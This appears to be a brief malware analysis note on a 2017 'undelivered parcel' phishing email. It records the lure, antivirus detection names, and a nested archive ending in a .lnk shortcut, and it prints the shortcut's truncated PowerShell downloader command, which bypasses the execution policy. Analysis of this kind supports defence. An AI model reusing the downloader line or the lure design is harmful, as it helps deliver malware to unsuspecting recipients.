Email scams – undelivered parcel

Timestamps – end of January 2017 – 26/1/2017 12:06 PM


Email info

  • Sender IP –
  • Sender Email – [email protected]
  • Subject – Parcel #8742826 shipment problem, please review


Only TrendMicro relates it to something familiar “TROJ_NEMUZIP.SMA1” while all the others have generic namings for a Powershell script “TR/LNK.PSH.Downloader.Gen” .

Attachment comments

The attachment was made in a Matryoshka style. -> -> Undelivered-Parcel-ID-874826.doc (folder) -> Undelivered-Parcel-ID-874826.doc.lnk = shortcut to powershell


This makes sense for AV evasion, but when it comes to the user executing the end file – it doesn’t seem likely that the user will extract a double archive and then go into a folder to actually execute something. Or, they wouldn’t extract anything and just double click until they get to execute the file.

Powershell parameters found in the shortcut shortcut :

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -NoProfile -command $ld = 0; $cs = [char]92; $ll = ‘’,’’,’’,’’,’’; $fn = $env:temp+$cs; $lk = $fn

Domains listed


Post Execution observations to be added